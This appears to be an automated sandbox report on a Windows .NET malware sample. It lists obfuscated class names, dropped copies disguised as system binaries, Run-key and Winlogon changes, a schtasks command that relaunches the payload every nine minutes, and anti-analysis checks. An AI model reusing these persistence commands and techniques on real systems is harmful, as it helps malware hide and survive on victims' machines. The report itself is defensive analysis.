            Source: XPC5PMKegV.exe, vE1YYuTVv8jMv0AVwES.csHigh entropy of concatenated method names: '_8o8', 'kLqMeRMLWgiqFd68Ror', 'EVnuPHM0km9bXNVGoNi', 'cu1kfPMuFpNnlSrTirc', 'w7FoooMjvw5iSoy8o6p', 'ap30llMnxfUxERai0LY', 'jHagxFMot2dRcMk7SrO', 'bc4LjyMftPS7JD3BGP9', 'Pv5VG1MbR1kQSxI88fF', 'bKUDUGMXOfxfylT9wWm'
            Source: XPC5PMKegV.exe, XBTZN76hoCXgoYkol60.csHigh entropy of concatenated method names: '_5X2', '_7WJ', '_4ws', 'B28', 'PcnJcirUBUdVJNMJeYH', 'mbIHRGrTWNmcRhoAoZS', 'K7xOyTrN99H3aHAdYUk', 'PpqOhTr67jd6FVs9OMg', 'cKbHpdriVnwqKxoqbIa', 'hALbbZry6Me7rsR4A2f'
            Source: XPC5PMKegV.exe, lXoOP5QTREP9xDLYCI.csHigh entropy of concatenated method names: 'cvAfloN0H', 'Rvl0P3spn', 'kYFxlFjvw', 'L5lBGgkQPiWM4jYfeTc', 'ELDXsPks228pXv2Y9mV', 'e1JqZtk1ZnUU7usmybP', 'HHuTtjkvFguym0L0k05', 'zMC7O8kt0gek4OWcvHc', 'n6dMQOkhLPoWqCk0NIx', 'yWTtVZkdm5WpuvIYJPS'
            Source: XPC5PMKegV.exe, lhaS2MLTXsLTkjdFXaU.csHigh entropy of concatenated method names: 'DStG1dZbkuBlXQ1D21h', 'p80hBmZXIDlO70m6lU5', 'Af6PN8Zo1b4KoWDFRAr', 'Kyac6AZfGY4kriT0Q6O', 'trWnY0064i', 'QGDgbKZFv9Bt4EqXnEG', 'P66CywZZEojEb48TEyH', 'wvYQcQZ59Oxf4RHirye', 'ygoclQZSN1d6AaYYIr1', 'vFLyVnZCNlbx2n5rgXY'
            Source: XPC5PMKegV.exe, T9dPy4UqN7utw0tnUw4.csHigh entropy of concatenated method names: 'K8a', '_117', 'd7day5iD17', 'ki6avnoc3m', 'ThhaDXonNf', '_8x7', 'Irc', 'R21', 'B53', 'zP8'
            Source: XPC5PMKegV.exe, vo1wu1T6dJaT5w0DnGx.csHigh entropy of concatenated method names: 'mTCra1Up9L', 'hV1rPU0rm5', 'gctrRm1yre', 'mnarpeRd0K', 'gWFTFIw2dCZJjreDwFb', 'jaERvnwGG9maoG6VKB7', 'Soi34sw4Sq807EJsHLG', 'l6dljqwBXqDyv6D9Xpm', 'YikDItwrfC9AIywq5S7', 'UyDd6Aw3HBfE2VEdeXL'
            Source: XPC5PMKegV.exe, Cl43QepmOtAMcFsmL1I.csHigh entropy of concatenated method names: '_56e', '_248', '_86A', 'vj4', 'W5n', 'EDxWCtG8CG', 'O5wWiYyfil', 'a6B', 'Khk', 'H1w'
            Source: XPC5PMKegV.exe, yNrGelTgmYGZ9MgvvgN.csHigh entropy of concatenated method names: '_348', '_55c', 'F36', 'RU3b48ip5n', 'yXtbIqKarg', 'lw8C0DuSgnfj7xGgaO0', 'GPZo2uuFKZ8BouZLb0b', 'FFuuyNuZeUYhFQS4YFq', 'bLaX6BuCaP2QVfCYGNm', 'uT5B0ruDD6Bl1JFZvJI'
            Source: XPC5PMKegV.exe, y7DvqyrIg8iyDOvbwQd.csHigh entropy of concatenated method names: 'XakJz59fFZ', 'nHBXtw0UQQ', 'nKHXwjVJi0', 'rYoXcjhXZ7', 'VCrXJC3Dtn', 'Rb5XXG9ciS', 'L1IXStSH0C', 'aeJXsYGOkY', 'snbXreZwRP', 'RaxX4yq1Aa'
            Source: XPC5PMKegV.exe, KKQfgQUEn3LI0XDAIUd.csHigh entropy of concatenated method names: '_518', 'E6y', '_17E', '_79s', 'XCq', 'vm2', '_5yr', 'dlO', 'Q7M', '_59C'
            Source: XPC5PMKegV.exe, PiegUarrZrIu2NpVPEw.csHigh entropy of concatenated method names: 'tfJcoCkUOt', 'EhYceJuMfq', 'z2fcuySynW', 'mo3cEsycOi', 'hd0c2sYnMK', 'vjrcHNA1KR', 'hZp9e5xwOLC1uJ8xNPb', 'ppfabGxAI4SS2oFC2JA', 'XdbF6BxeLCc7Keyd36p', 'tqqB1RxIo3mTj0Fy62k'
            Source: XPC5PMKegV.exe, R8IPI66nNydVJAOWKZV.csHigh entropy of concatenated method names: 'Y23wUVNIGk', 'Vmm65AHQA1WuA2nhaxs', 'eX2iiyHvd3lUcUu2BRQ', 'VNvxf1HsBZM7uVtZVLB', 'Fv3D5fH1n5jbGtlJkXq', 'IqYbtZHtJhSRy4gofSR', '_314', '_7WJ', 'IO3', 'B28'
            Source: XPC5PMKegV.exe, OOIlrKLkTG0jrXpeMce.csHigh entropy of concatenated method names: 'EXj2FBQJr5DOQwnZeEB', 'oy5SmDQ7mEFmNBSp6TQ', 'R44978QR7oY5IviHAf0', 'l6tM6OQHJ480Lxwn96O', 'UkYqHuQx1d9jUlcUeSN', 'CeiDE5QECEpT64kR39I', 'vR8SolQPravNaVeiMg5'
            Source: XPC5PMKegV.exe, enXgVk6KGg56u0Jag5M.csHigh entropy of concatenated method names: 'SUicV37jG1', 'GHU80e7roxo9oCWdKuI', 'i7hcgT73nAcLLvHwONn', 'xVJBFo72Jct0LwpP24L', 'Eo19i57B65ijVC9G7dd', 'dPhYud7Rc6iEuMbxpxe', 'W21', '_7WJ', '_294', 'B28'
            Source: XPC5PMKegV.exe, S7e5erUHxr37upvq8hh.csHigh entropy of concatenated method names: '_5U3', '_52K', '_6a8', 'oc7d3dnj2o', 'T5cdZ8ZPrd', 'JQqddUi68p', 'MvTdjDfX36', 'TPedK2sDV4', 'O9MdaFkqmm', 'u3Ct3jdlJoOsbW8hcwG'
            Source: XPC5PMKegV.exe, qxPm6oTdim0cupUcEK5.csHigh entropy of concatenated method names: 'oB5', '_7u7', '_4U6', 'QkJvDbFMfP', 'QyAbPrwq8J', 'HDLv1N2wKv', 'YGIbY78mVD', 'cWUu14umBsXBww3EfUe', 'BMn5HJuY8X7qcXAuK0a', 'CaVEHDudOIaGaqWbyn5'
            Source: XPC5PMKegV.exe, s74Io06BHr2pCjEhhdI.csHigh entropy of concatenated method names: 'xwh', '_7WJ', '_4o3', 'B28', 'ykiLu3r3l8aIBd76wI1', 'GC8KqurR5Cul0i0v1V0', 'rFDSXIrHBW3JRRwV5MU', 'b4Krp3rJ120qxD2Osym', 'i5kTPWr79J2RT19hJNG', 'uZyr1IrxVlsrVGnTx08'
            Source: XPC5PMKegV.exe, i8pocKTsgsG0IkhvhQS.csHigh entropy of concatenated method names: 'qTn', 'rMM', '_561', 'P7I', '_6pi', 'VqM', 'H2An2c0Ip3wicG7Ny9I', 'Yb4rrV0wdoP0U9cNemA', 'kYJPPI0A4CoAc7al9mr', 'fa7aq60MIqiOEMREpjH'
            Source: XPC5PMKegV.exe, mmOEm8p5CSZgC0ko5an.csHigh entropy of concatenated method names: '_79V', 'UnI', 's58', '_442', 'aNy8tNel1R', 'Eca', 'WtI8wsI5Wr', 'YiN8c73DdP', 'Y42', '_21Q'
            Source: XPC5PMKegV.exe, AudXQJUUixdtQM6BBRJ.csHigh entropy of concatenated method names: '_77s', 'iIQ', 'vN9', '_6c2', '_4d1', '_34n', 'Jx4', 'nkV', 'k4X', 'ZyP'
            Source: XPC5PMKegV.exe, rXFcRtpLTGp6O18MHSV.csHigh entropy of concatenated method names: 'nSC1OQGxYO', 'Jt05BPnumMPpFWjxBQL', 'ayl32gnjeJaGfRXSTrR', 'w86Kv1nLU6QVxw71f8R', 'QYGVASn0Ce9Xg2BFSt3', 'Tx7vPSX8Wi', 'g2pvRIpsg0', 'NgWvp911MF', 'YeBvB6tA3m', 'AEnvfgsf7k'
            Source: XPC5PMKegV.exe, Hi7dH5L4rVvSQPVg2PM.csHigh entropy of concatenated method names: 'EN8', '_441', 'eR1', '_284', 'V32', '_8BX', 'Yh5', 'Kg3', 'n91', 'y2f'
            Source: XPC5PMKegV.exe, YqypoILMY3VB7WPY2PE.csHigh entropy of concatenated method names: 'T4YY5x6tGt', 'RFTYNpAoCA', 'igdYhZFruC', 'R0YISo1hM9RSNRag2OO', 'NQsxNU1v0ySAw4aOCOr', 'zSV9n41tdMvGMovk2Kr', 'JMycAf1dTdkWqE5jKF8', 'tMguly1lW2HJQKXnNZD'
            Source: XPC5PMKegV.exe, ah4LpdpuUH7VAKThrBc.csHigh entropy of concatenated method names: 'b67', '_943', '_2E2', 'P9S', '_7KZ', '_184', 'm97', '_2RG', 'wsE', 'o96'
            Source: XPC5PMKegV.exe, oQb8nHUr3wNVABu6NEc.csHigh entropy of concatenated method names: 'sJtZ43KauV', 'SBvZytQy9U', '_431', 'YkLZviH3lO', 'xQMZDbAbDa', 'xqJZ12h97G', 'yeHZILaJLM', 'zf0s8TtMEwgLlXpHgwj', 'L2aPPBtLXykVhSwIL3x', 'HSfHq3t0LyMtqyq6cFY'
            Source: XPC5PMKegV.exe, zjjGX4TX1grg0geHsML.csHigh entropy of concatenated method names: '_2P7', '_79b', '_16R', 'aRgvXUC6If', 'wLhbF4rG0m', 'rv2AObuIbhAQfxYTTtT', 'z6agM5uwQNOhHi6KIA4', 'urOD5ZuA6kCETXJ0vme', 'FBAovFuMRIIqGajH4yX', 'UrRR95uL5JMyuAhJAaa'
            Source: XPC5PMKegV.exe, cURt8D6W9fRgffMVW9j.csHigh entropy of concatenated method names: 'o7twawKPxq', 'DgrZp93IQ7h0KFbvp8t', 'z7153e3w0VBKkcavRTd', 'wBYttM3VZRsCj00pc92', 'gwGZL23ehfPARjRZnDs', 'I5s2F63AyVNk1qpL8mx', 'qKuTqx3MUtAEkoVwx6O', 'VWXcAr3Ly9MWBr2E4ss', 'rKhBCo30QuVLkLBWEwZ', 'K9F'
            Source: XPC5PMKegV.exe, WN9CqqUtiEwAaQv9Fqf.csHigh entropy of concatenated method names: 'TqIK9Vf9yX', 'JIX9O8lsJXUnxaHtipr', 'VGnLxYl1tKUwVKFN8nA', 'l4YHYWlCQLihowZL4ul', 'u94OVflDyReSfG1pJVU', '_8e5', 'DFsjExC3Wi', 'E75', '_2e1', '_127'
            Source: XPC5PMKegV.exe, FenpyjLwPCfwbEEXR0I.csHigh entropy of concatenated method names: '_793', '_19i', 'j2m', 'Yxs3kxR7FN', '_91O', '_7x6', 'F7G', 'ReP', 'cA7', 'ATW'
            Source: XPC5PMKegV.exe, Xr4klE60dIStoOfaxsx.csHigh entropy of concatenated method names: '_71I', '_7WJ', 'TO2', 'B28', 'URNoZbrAVGVf45mGvRY', 'GiRHeIrML89nHr1ByWH', 'ld88whrLm7RXTiNDOwN', 'r1HyTcr0ZF93LiLKsjy', 't9T0uHruAWHVJPkd5Ir', 't5wfQZrjqficcx2Iqo0'
            Source: XPC5PMKegV.exe, BraILGoZbsvlMgZRst.csHigh entropy of concatenated method names: '_3C3', '_7WJ', 'S9L', 'B28', 'OYHlc7ySn', 'HjpuYc8DdR546k9ieWe', 'Bq1noh8sO7V6ntcbtcu', 'zODreF81B53382mf0Rs', 'AfA4gu8QLrF7SJsYhWA', 'aKjr7o8vu0ounwuEHhL'
            Source: XPC5PMKegV.exe, v6xvNMjq33JygCIfgl.csHigh entropy of concatenated method names: 'HxeY9IHg5', 'Yg23nKx2v', 'vWYZ8XTCP', 'xtkdkmt92', 'bx0jbnn8A', 'EmYKiDEkW', 'kQ7acmJjn', 'bUsCYIk3n0bLg4bdM0n', 'xdCHsLkRMjTi0BvXXHI', 'AdfDlYkHtXsAjvdxktc'
            Source: XPC5PMKegV.exe, XnHcmU6sNgmgeTEWQeh.csHigh entropy of concatenated method names: '_88F', '_7WJ', '_461', 'B28', 'd4REik3no62wAjmv5JC', 'iwCo0O3oF5AYOwSp67U', 'dAPYiQ3f7nllffwVPrh', 'zhldu33b7rqQ3RcXMUW', 'MxDHxU3Xbh4Pa9aQVFk', 'i6aKmE35jsxy9qc0mo1'
            Source: XPC5PMKegV.exe, ExFbTxTctUxeJ6gZ2sm.csHigh entropy of concatenated method names: 'Iru4lDiX9B', 'wEq45uLBSL', 'jHD4NkrhHA', 'ghv4hpIOn0', 'ejWqnsMv0C5ZQDkdPZu', 'Ox8sMEMtyWlApcBvxKs', 'IExsqEMh202rmNawafV', 'PCrvQpM1QVjfBcDYVET', 'rgII1nMQrLNUdO3lxXn', 'bgHum3Mdbv1lhKFRDVV'
            Source: XPC5PMKegV.exe, emQcjYTphjRmG4e4fpO.csHigh entropy of concatenated method names: 'g90rAIJlhk', 'bv9rlgqeCI', 'dJsr5g1YZP', 'IQ5rNHeBFd', 'u74rhUQsDG', 'lrlroskSbW', 'uuqsOTwD9THOprATYHi', 'FtVdOAwZZwg2BilNSQe', 'U3pvL7wCKWopAb5Wpky', 'uLZQH5wsk76hWEBQbVH'
            Source: XPC5PMKegV.exe, fJvHgir7Sa8PWpIwxxY.csHigh entropy of concatenated method names: 'UR1X8C7fk9', 'TCvXWOtkfi', 'JO3GK7p59S5k8rCLdEc', 'Uf2rIDpSlDL8sEoR6O2', 'DqsTS8pbGjSgMJChN18', 'iQHiywpXJkadjhQ7r6o', 'WZErWYpFdBnbNd9DyRo', 'qKkgrjpZwYp59IdSqMe', 'sfH6E1pCvKDqkRo1pF1', 'AEM7Z4pDE1cxOIfmh2m'
            Source: XPC5PMKegV.exe, KMFatX6aIoqOO90nguW.csHigh entropy of concatenated method names: '_155', '_7WJ', 'viq', 'B28', 'Caa0qwBNpOf4DQRhu00', 'jTTH4XB6nSriIJsNENF', 'v3PZlOBis2hPj3bZF92', 'icwkqEBye2lPmLwRgC9', 'fVEJrCBzHBLqQ1DBmDH', 'XmlBK2rqB9uUu4B8JI6'
            Source: XPC5PMKegV.exe, YIN46I6bPIG146HOuBG.csHigh entropy of concatenated method names: 'Euhcw0v62P', 'CmMccSv0Z8', 'dSGcJsOcxJ', 'KdEMRbHOyYdJdjqYoxe', 'IRu0aXHUQHMactmfFgT', 'Nw3u5hHWl4X3QDvpiif', 'BtlULtHgDlsVJF0Ysfv', 'Rgf7rEHTTumWjO0fIxK', 'a0rvjiHNux54YZFf968', 'hr78ScH6EKMbJ1mhL3l'
            Source: XPC5PMKegV.exe, pc97v63xoNilgjE5dd.csHigh entropy of concatenated method names: '_9Qy', '_7WJ', 'M4k', 'B28', 'Fva6cm8i7SP87o4r33Z', 'ckRwne8ykMfEi4pBRJK', 'G3dZ3y8zpaMRdsZPYPc', 'ALkbWuGq1rfEHVV0PyA', 'T76tPqGkfy3AoMDgfdP', 'tmvLKFG8Q9jEWvyGPLf'
            Source: XPC5PMKegV.exe, gpVoPR6MnR9rq20vqqt.csHigh entropy of concatenated method names: '_84K', '_7WJ', 'dM7', 'B28', 'v1Kg3MR13EmAmMOH18n', 'sYJUbERQ0dZIefmpkLI', 'y4rpY3RvRfVoiMRYWGe', 'SkEfVIRtco7nJUQL1oS', 'tAZw4fRhQM4UqxWsWeY', 'm1tvKtRdoIcU9IdQV2O'
            Source: XPC5PMKegV.exe, vZcZ9lLvOdqRkTgSSt3.csHigh entropy of concatenated method names: 'md7YoYnEqj', 'sWAYelHPwL', 'm0hYuc1y5O', 'oJ0suO1KwOIOkksfT32', 'PQwfA51mbei1sI2P8oG', 'eRQpr01YO2i35lsN8iu', 'Eu5CIy198TprDrcAgIf', 'Gdwmis1a3XLLSbf67A0', 'l1xEmN1WBo0XgSPlLIJ', 'mcGcMl1gX3MHe02m3iV'
            Source: XPC5PMKegV.exe, ToRf81pKKx7PUCnYXGA.csHigh entropy of concatenated method names: 'NCaC3VLnUk', 'gkCCddsJ8l', 'dH4C8HMpQa', 'fx3CWjdkEN', 'U3MCCJL33r', 'gsPCijVs9E', 'EWvCOfouUo', 'UobCbdpi6y', 'RjuCTojRkR', 'BArCVbOFIN'
            Source: XPC5PMKegV.exe, Lc2D1kpEFFdl1WnT2Ca.csHigh entropy of concatenated method names: 'BDC8B8ErwO', 'B0e8felmwZ', 'thg805PkYx', 'XJp8xFyUog', 'DQ2893B7mk', 'PX4r9bfjgpcaX5fdLcY', 'XkfuuTf0vIu21bTHxYg', 'iGHOQCfuBLH7POr3LTV', 'qC4JSofnl1NZsNvqwec', 'fqN9b5fogGqRXgCTKmB'
            Source: XPC5PMKegV.exe, GJrlJXuKAq1ko9Y3Q7.csHigh entropy of concatenated method names: '_4I7', '_7WJ', '_98d', 'B28', 'pil8IY2TKDVusHwN18H', 'guZACt2NRiOvmsWMsA3', 'JxCEU126Mh92HPaa4uF', 'ICxoPa2iOjbG9pkX5Fl', 'NdShRW2yMDRYIstOsld', 'aNmTE02z9RLxCX4S6Pe'
            Source: XPC5PMKegV.exe, fcrO0r6TNPeWDGnraTV.csHigh entropy of concatenated method names: '_732', '_7WJ', '_1t4', 'B28', 'O3WZm8BSeZ66XDlPlZj', 's3DKXfBFLBmTWdFEDnK', 'IRByeIBZJvqJGUSaYsH', 'UtQhF5BCY3t8dRLEypS', 'cBEUrCBDqYRUtYBJ9kD', 'hinNAdBsSEK3HQNkcLj'
            Source: XPC5PMKegV.exe, aYA5pTUsFLsGxwxURbV.csHigh entropy of concatenated method names: 'ogRZnIE5cO', 'pxsZMHUsS5', 'aBeZQ9Fm3n', 'OC0Zm6F9P7', 'hxWZk4Fctu', 'LqF6DWh8DvDDTNZCl3Y', 'NZcZ0khGhCY9iFOquQy', 'suNLuCh4P65yBwD2rXd', 'zrjHAVh2rIRigZTw048', 'RpD1YahBaQpnDxDvs6j'
            Source: XPC5PMKegV.exe, wkRtMcrjodS8Q05oFyT.csHigh entropy of concatenated method names: 'WYyXMhB9vV', 'pxEXQAsOYM', 'eUXXmJpieZ', 'Tm3Xk0nZwI', 'NkxXYxSklD', 'QcnW7vcB0LiPDlDX4C9', 'KiAD3kcrNy4ZPNpTBLw', 'WpFkuCc4AaDCcpCh8J2', 'bSTgNwc2jmFE2AVZZGJ', 'zLwcjfc3jXZnKFM1OM7'
            Source: XPC5PMKegV.exe, wxkLHYngCXJyWVhuQT.csHigh entropy of concatenated method names: 'a4d', '_7WJ', 'Lq4', 'B28', 'tn2xLuGsP5jZxpZL10C', 'fZhKwFG16aBwpmmh3S9', 't9K4t3GQcBe3cGY68Al', 'fXJrHDGvSst4iOegyUW', 'yqC62VGtuFb84YyctVl', 'fBHEwrGhkDbXuXmN0Au'
            Source: XPC5PMKegV.exe, Ogvq2w6V8UPJloOWYuA.csHigh entropy of concatenated method names: '_16M', '_7WJ', 'QAc', 'B28', 'jVfpxjrbIhyFGEryxNQ', 'raDs5trXkQd5Gjriy8H', 'K18Vlkr5NdHq3EokIep', 'shkyrorSdHwl5STlHjs', 'vWk0dTrFnOJ6UP1hqvU', 'Qjy2HqrZcp0OrE6t9ik'
            Source: XPC5PMKegV.exe, TrHuoypSmf5stJTRsW5.csHigh entropy of concatenated method names: 'VUYWU8Mgy3', 'EOfWfB5orW', 't98W0NAYg3', 'WQTWx3Olgm', 'aQgW9YOPXt', 'HEPWgEGsAA', 'r9AWqEmMGa', 'XoJWGvADCe', 'm44WAE0kJZ', 'GrcWlC2Igh'

            Persistence and Installation Behavior

            Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Recovery\xMLVfJVxhYAkoCJ.exe
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\xMLVfJVxhYAkoCJ.exe
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Program Files (x86)\Microsoft.NET\System.exe
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe

            Boot Survival

            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJ
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegistryJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 9 /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeMemory allocated: 1180000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeMemory allocated: 1AE60000 memory reserve | memory write watch
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeMemory allocated: 1720000 memory reserve | memory write watch
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeMemory allocated: 1B2E0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeMemory allocated: C90000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeMemory allocated: 1A980000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeMemory allocated: 2A60000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeMemory allocated: 1AE20000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeMemory allocated: 2DA0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeMemory allocated: 1AF40000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeMemory allocated: B90000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeMemory allocated: 1A8A0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeMemory allocated: E00000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeMemory allocated: 1A980000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeMemory allocated: 1270000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeMemory allocated: 1ADF0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeMemory allocated: 1260000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeMemory allocated: 1AEC0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeMemory allocated: 9B0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeMemory allocated: 1A5E0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeMemory allocated: 1720000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeMemory allocated: 1AF60000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeMemory allocated: 11B0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeMemory allocated: 1AAF0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeThread delayed: delay time: 922337203685477
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
